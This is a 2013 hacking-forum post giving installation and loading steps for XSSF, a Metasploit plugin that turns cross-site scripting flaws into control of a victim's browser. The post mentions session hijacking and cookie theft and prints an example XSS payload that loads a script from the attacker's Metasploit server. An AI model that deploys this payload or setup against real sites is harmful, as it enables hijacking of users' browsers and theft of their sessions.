comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Xssf Metasploit Plugin

  • 0 Respuestas
  • 3098 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Junio 15, 2013, 02:52:51 pm »
http://www.youtube.com/watch?v=soNCw0FnPVU


[ Install XSSF metasploit plugin ]
'this tutorial will focus on installing/using xssf on kali-linux distros'


Description:
The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation
task into a much easier work. XSSF allows creating a communication channel with the targeted browser
(from a XSS vulnerability) in order to perform further attacks, its integration into the Metasploit Framework
allows users to launch MSF browser based exploit easilly from an XSS vulnerability,In addition, an interesting
though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser,
using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient
to realize this action... 'this tool requires metasploit installed to work'




Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - open terminal and navigate to [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF using SVN repository
[ svn export http://xssf.googlecode.com/svn/trunk ./ --force ]


XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>


XSSF home:
[ https://code.google.com/p/xssf/ ]
Source Cod:
[ https://code.google.com/p/xssf/source/browse/trunk/modules/?r=5#modules%2Fauxiliary%2Fxssf ]
« Última modificación: Agosto 16, 2014, 10:42:54 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1653
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 19578
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 2008
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

Iniciado por CalebBucker

Respuestas: 4
Vistas: 4424
Último mensaje Diciembre 23, 2012, 10:08:37 pm
por CalebBucker
Send vídeo Youtube the victim with Metasploit

Iniciado por BrowserNet

Respuestas: 1
Vistas: 3122
Último mensaje Mayo 23, 2016, 07:46:58 pm
por Random